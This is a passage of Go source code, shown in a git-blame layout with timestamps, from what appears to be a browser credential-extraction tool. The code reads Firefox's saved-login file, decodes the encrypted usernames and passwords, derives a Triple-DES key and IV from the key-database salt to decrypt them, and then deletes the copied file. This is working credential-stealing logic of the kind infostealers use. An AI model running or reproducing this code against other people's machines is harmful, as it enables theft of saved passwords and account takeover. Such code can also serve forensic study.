log.Warn(hex.EncodeToString(tk.Sum(nil)))
|
|
|
|
tkPlus := append(tk.Sum(nil), entrySalt...)
|
|
|
|
k2 := hmac.New(sha1.New, chp[:])
|
|
|
|
k2.Write(tkPlus)
|
|
|
|
log.Warn(hex.EncodeToString(k2.Sum(nil)))
|
|
|
|
k := append(k1.Sum(nil), k2.Sum(nil)...)
|
|
|
|
iv := k[len(k)-8:]
|
|
|
|
key := k[:24]
|
|
|
|
log.Warn("key=", hex.EncodeToString(key), "iv=", hex.EncodeToString(iv))
|
|
|
|
block, err := des.NewTripleDESCipher(key)
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
blockMode := cipher.NewCBCDecrypter(block, iv)
|
|
|
|
sq := make([]byte, len(encryptText))
|
|
|
|
blockMode.CryptBlocks(sq, encryptText)
|
|
|
|
return sq
|
|
|
|
}
|
|
|
|
|
|
|
|
func paddingZero(s []byte, l int) []byte {
|
|
|
|
h := l - len(s)
|
|
|
|
if h <= 0 {
|
|
|
|
return s
|
|
|
|
} else {
|
|
|
|
for i := len(s); i < l; i++ {
|
|
|
|
s = append(s, 0)
|
|
|
|
}
|
|
|
|
return s
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2020-07-07 12:27:14 +00:00
|
|
|
func GetLoginData() (l []loginData) {
|
|
|
|
s, err := ioutil.ReadFile(utils.FirefoxLoginData)
|
2020-07-06 07:19:11 +00:00
|
|
|
if err != nil {
|
|
|
|
log.Warn(err)
|
|
|
|
}
|
2020-07-07 12:27:14 +00:00
|
|
|
defer os.Remove(utils.FirefoxLoginData)
|
2020-07-06 07:19:11 +00:00
|
|
|
h := gjson.GetBytes(s, "logins")
|
|
|
|
if h.Exists() {
|
|
|
|
for _, v := range h.Array() {
|
|
|
|
var (
|
2020-07-06 08:13:25 +00:00
|
|
|
m loginData
|
2020-07-06 07:19:11 +00:00
|
|
|
u []byte
|
|
|
|
p []byte
|
|
|
|
)
|
2020-07-06 08:13:25 +00:00
|
|
|
m.LoginUrl = v.Get("formSubmitURL").String()
|
2020-07-06 07:19:11 +00:00
|
|
|
u, err = base64.StdEncoding.DecodeString(v.Get("encryptedUsername").String())
|
|
|
|
m.encryptUser = u
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
p, err = base64.StdEncoding.DecodeString(v.Get("encryptedPassword").String())
|
|
|
|
m.encryptPass = p
|
2020-07-06 08:13:25 +00:00
|
|
|
m.CreateDate = utils.TimeStampFormat(v.Get("timeCreated").Int() / 1000)
|
2020-07-06 07:19:11 +00:00
|
|
|
l = append(l, m)
|
|
|
|
}
|
|
|
|
}
|
|
|
|
return
|
|
|
|
}
|
|
|
|
|
|
|
|
func decryptLogin(s []byte) (pbe PasswordAsn1) {
|
|
|
|
_, err := asn1.Unmarshal(s, &pbe)
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
return pbe
|
|
|
|
}
|